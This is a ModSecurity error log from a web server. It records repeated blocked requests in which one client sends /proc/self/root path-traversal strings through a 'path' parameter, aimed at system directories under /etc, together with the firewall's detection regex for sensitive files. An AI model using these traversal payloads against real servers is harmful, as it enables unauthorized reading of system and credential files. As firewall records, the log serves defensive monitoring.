[Mon Mar 16 12:33:20.120668 2026] [:error] [pid 21946:tid 140411607643904] [client 74.7.243.203:38648] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgiwHbQATo66fKoS7xN8AAAANA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:33:21.408194 2026] [:error] [pid 10831:tid 140411574073088] [client 74.7.243.203:49888] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgiwY6lpbStxTqkSktrIgAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:33:27.880003 2026] [:error] [pid 10831:tid 140411741927168] [client 74.7.243.203:49890] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgix46lpbStxTqkSktrKAAAAkA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:33:29.235214 2026] [:error] [pid 10709:tid 140411741927168] [client 74.7.243.203:49896] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgiyRXjF1vJNtV6CWr0ewAAAcA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:33:30.547123 2026] [:error] [pid 21805:tid 140411658000128] [client 74.7.243.203:33234] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgiyrABkC4fWIHEf8HpCQAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:33:31.852841 2026] [:error] [pid 21533:tid 140411691570944] [client 74.7.243.203:33236] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgiy3jZBu2q05ozVU9WxQAAAUY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:33:35.290341 2026] [:error] [pid 10709:tid 140411599251200] [client 74.7.243.203:33246] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgizxXjF1vJNtV6CWr0fwAAAdE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:33:37.606173 2026] [:error] [pid 32654:tid 140411674785536] [client 74.7.243.203:33250] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgi0QlT9VtDQc7bgUyv3wAAAQg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:33:38.903082 2026] [:error] [pid 10709:tid 140411540502272] [client 74.7.243.203:33258] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgi0hXjF1vJNtV6CWr0gAAAAdg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:33:40.222416 2026] [:error] [pid 10709:tid 140411616036608] [client 74.7.243.203:33458] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgi1BXjF1vJNtV6CWr0gQAAAc8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:33:42.670202 2026] [:error] [pid 21946:tid 140411699963648] [client 74.7.243.203:33470] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgi1nbQATo66fKoS7xN8wAAAMU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:33:43.985400 2026] [:error] [pid 10709:tid 140411548894976] [client 74.7.243.203:33472] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgi1xXjF1vJNtV6CWr0ggAAAdc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:33:45.167304 2026] [:error] [pid 21946:tid 140411548894976] [client 74.7.243.203:33476] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgi2XbQATo66fKoS7xN9AAAANc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:33:48.780069 2026] [:error] [pid 21805:tid 140411716749056] [client 74.7.243.203:33482] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgi3LABkC4fWIHEf8HpDQAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:33:50.197820 2026] [:error] [pid 32654:tid 140411540502272] [client 74.7.243.203:41942] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgi3glT9VtDQc7bgUyv7wAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:33:52.676389 2026] [:error] [pid 32654:tid 140411708356352] [client 74.7.243.203:41958] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgi4AlT9VtDQc7bgUyv9AAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:33:53.979037 2026] [:error] [pid 21946:tid 140411590858496] [client 74.7.243.203:41972] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgi4XbQATo66fKoS7xN-AAAANI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:33:57.398911 2026] [:error] [pid 10709:tid 140411691570944] [client 74.7.243.203:41978] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgi5RXjF1vJNtV6CWr0iwAAAcY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:33:57.770754 2026] [:error] [pid 21946:tid 140411649607424] [client 74.7.244.31:49314] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgi5XbQATo66fKoS7xN-QAAAMs"]
[Mon Mar 16 12:33:59.838079 2026] [:error] [pid 21533:tid 140411733534464] [client 74.7.243.203:41982] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgi53jZBu2q05ozVU9WywAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:34:01.194561 2026] [:error] [pid 11972:tid 140411624429312] [client 74.7.243.203:58934] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgi6Zqj1wV0Si-OkefspQAAAA4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:34:02.521467 2026] [:error] [pid 11972:tid 140411725141760] [client 74.7.243.203:58942] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgi6pqj1wV0Si-OkefspgAAAAI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:34:03.731666 2026] [:error] [pid 10651:tid 140411666392832] [client 74.7.243.203:58952] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgi67ysWC90G-1nBrBEIgAAAYk"], referer: 